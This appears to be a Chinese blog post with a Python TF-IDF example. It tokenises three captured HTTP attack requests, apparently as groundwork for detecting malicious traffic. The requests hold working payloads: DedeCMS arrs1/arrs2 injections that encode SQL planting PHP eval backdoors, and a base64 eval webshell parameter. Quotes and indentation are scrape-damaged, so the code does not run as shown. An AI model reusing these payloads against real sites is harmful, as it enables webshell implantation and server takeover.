tf-idf实例一

#!/usr/bin/env python

-- coding:utf-8 --

import nltk
import math
import jieba
import string
from nltk.corpus import stopwords
from collections import Counter
from nltk.stem.porter import *
from sklearn.feature_extraction.text import TfidfVectorizer

text1 = “http://www.10100000.com/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&arrs2[]=32&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=111&arrs2[]=114&arrs2[]=103&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=112&arrs2[]=114&arrs2[]=101&arrs2[]=103&arrs2[]=95&arrs2[]=114&arrs2[]=101&arrs2[]=112&arrs2[]=108&arrs2[]=97&arrs2[]=99&arrs2[]=101&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=91&arrs2[]=99&arrs2[]=111&arrs2[]=112&arrs2[]=121&arrs2[]=114&arrs2[]=105&arrs2[]=103&arrs2[]=104&arrs2[]=116&arrs2[]=93&arrs2[]=47&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=36&arrs2[]=95&arrs2[]=82&arrs2[]=69&arrs2[]=81&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=39&arrs2[]=39&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=93&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=114&arrs2[]=114&arrs2[]=111&arrs2[]=114&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=0 GET /plus/mytag_js.php?arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=116&arrs2%5B%5D=97&arrs2%5B%5D=103&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=40&arrs2%5B%5D=97&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=44&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=41&arrs2%5B%5D=32&arrs2%5B%5D=86&arrs2%5B%5D=65&arrs2%5B%5D=76&arrs2%5B%5D=85&arrs2%5B%5D=69&arrs2%5B%5D=83&arrs2%5B%5D=40&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=104&arrs2%5B%5D=111&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=109&arrs2%5B%5D=115&arrs2%5B%5D=32&arrs2%5B%5D=53&arrs2%5B%5D=46&arrs2%5B%5D=55&arrs2%5B%5D=32&arrs2%5B%5D=48&arrs2%5B%5D=100&arrs2%5B%5D=97&arrs2%5B%5D=121&arrs2%5B%5D=60&arrs2%5B%5D=98&arrs2%5B%5D=114&arrs2%5B%5D=62&arrs2%5B%5D=103&arrs2%5B%5D=117&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=101&arrs2%5B%5D=44&arrs2%5B%5D=32&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=115&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=46&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=103&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=59&dopost=saveedit&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120 HTTP/1.1\r\nhost: www.10100000.com\r\nx-forwarded-for: 178.156.202.20\r\nreferer: http://www.10100000.com/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&arrs2[]=32&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=111&arrs2[]=114&arrs2[]=103&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=112&arrs2[]=114&arrs2[]=101&arrs2[]=103&arrs2[]=95&arrs2[]=114&arrs2[]=101&arrs2[]=112&arrs2[]=108&arrs2[]=97&arrs2[]=99&arrs2[]=101&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=91&arrs2[]=99&arrs2[]=111&arrs2[]=112&arrs2[]=121&arrs2[]=114&arrs2[]=105&arrs2[]=103&arrs2[]=104&arrs2[]=116&arrs2[]=93&arrs2[]=47&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=36&arrs2[]=95&arrs2[]=82&arrs2[]=69&arrs2[]=81&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=39&arrs2[]=39&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=93&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=114&arrs2[]=114&arrs2[]=111&arrs2[]=114&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=0\r\nuser-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\r\nflow-info: eyJhcHBfbmFtZSI6ICJwYTE4LXNob3AtY2MtaW50ZXJuZXQiLCAidW5peF90aW1lIjogMTU3NDYwODM4MC4wMTUsICJhc3NldCI6ICIifQ==\r\nConnection: keep-alive\r\nAccept: /\r\nAccept-Encoding: gzip, deflate\r\n\r\n”
text = text1.replace(’\r\n’, ’ ‘)
text =text.replace(’\n’,’ ‘)
text =text.replace(’/’,’ ‘)
text = text.replace(’?’,’ ‘)
text =text.replace(’.’,’ ‘)
text =text.replace(’&’,’ ‘)
text =text.replace(’:’,’ ‘)
#text =text.replace(’=’,’ ‘)
text =text.replace(’%’,’ ')
print(“text:”,text)

#tokens_text = get_tokens(text)
#print(type(tokens_text),tokens_text)

cut_elements = jieba.cut(text)
text_list = []
for ele in cut_elements:
if len(ele) ==1:
#print(“1:”,ele)
continue
#print(“ele:”,ele,type(ele))
text_list.append(ele)
print(text_list)
counter1 = Counter(text_list)
print(“counter1”,counter1)

text2 = “中国 美国 ysy=%40session_start%28%29%3B%24_SESSION%5Bchr%2890%29%5D%3D%24_POST%5Bchr%28124%29%5D%3B%40eval%28base64_decode%28%24_SESSION%5Bchr%2890%29%5D%29%29%3Bdie%28%29%3B&|=ZWNobyAie3JvYm90fSI7”
text = text2.replace(’\r\n’, ’ ‘)
text =text.replace(’\n’,’ ‘)
text =text.replace(’/’,’ ‘)
text = text.replace(’?’,’ ‘)
text =text.replace(’.’,’ ‘)
text =text.replace(’&’,’ ‘)
text =text.replace(’:’,’ ‘)
#text =text.replace(’=’,’ ‘)
text =text.replace(’%’,’ ')
print(“text:”,text)

cut_elements = jieba.cut(text)
print(“type cut_elements:”,type(cut_elements),cut_elements)
text_list = []
for ele in cut_elements:
if len(ele) ==1:
#print(“1:”,ele)
continue
#print(“ele:”,ele,type(ele))
text_list.append(ele)
print(text_list)
counter2 = Counter(text_list)
print(“counter2:”,counter2)

text3 = “GET /plus/download.php?arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=83&arrs2%5B%5D=69&arrs2%5B%5D=84&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=102&arrs2%5B%5D=105&arrs2%5B%5D=108&arrs2%5B%5D=101&arrs2%5B%5D=95&arrs2%5B%5D=112&arrs2%5B%5D=117&arrs2%5B%5D=116&arrs2%5B%5D=95&arrs2%5B%5D=99&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=101&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=115&arrs2%5B%5D=40&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=109&arrs2%5B%5D=111&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=46&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=118&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=40&ar=True&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&open=1 HTTP/1.1\r\nhost: www.ph.com.cn\r\nx-forwarded-for: 154.92.246.226\r\ncontent-type: text/html\r\nuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\r\nflow-info: eyJhcHBfbmFtZSI6ICJpZi1waC13d3ciLCAidW5peF90aW1lIjogMTU3NDU5OTg1Ni4wMjksICJhc3NldCI6ICIxNzIuMjUuMjM2LjcifQ==\r\nConnection: keep-alive\r\nAccept: /\r\nAccept-Encoding: gzip, deflate\r\n\r\n”
text = text3.replace(’\r\n’, ’ ‘)
text =text.replace(’\n’,’ ‘)
text =text.replace(’/’,’ ‘)
text = text.replace(’?’,’ ‘)
text =text.replace(’.’,’ ‘)
text =text.replace(’&’,’ ‘)
text =text.replace(’:’,’ ‘)
#text =text.replace(’=’,’ ‘)
text =text.replace(’%’,’ ')
print(“text:”,text)

cut_elements = jieba.cut(text)
text_list = []
for ele in cut_elements:
if len(ele) ==1:
#print(“1:”,ele)
continue
#print(“ele:”,ele,type(ele))
text_list.append(ele)
print(text_list)
counter3 = Counter(text_list)
print(“counter3:”,counter3)
print("############ all counter:")
print(counter1,counter2,counter3)

def tf(word, count):
return count[word] / sum(count.values())

def n_containing(word, count_list):
return sum(1 for count in count_list if word in count)

扫描二维码关注公众号,回复: 8645315 查看本文章

def idf(word, count_list):
return math.log(len(count_list) / (1 + n_containing(word, count_list)))

def tfidf(word, count, count_list):
return tf(word, count) * idf(word, count_list)

countlist = [counter1, counter2, counter3]
print(type(counter3),len(counter1))
print(counter3[“GET”])

for i, count in enumerate(countlist):
print(“Top words in document {}”.format(i + 1))
scores = {word: tfidf(word, count, countlist) for word in count}
print(“scores:”,scores)

发布了114 篇原创文章 · 获赞 18 · 访问量 3万+

猜你喜欢

转载自blog.csdn.net/WangYouJin321/article/details/103987073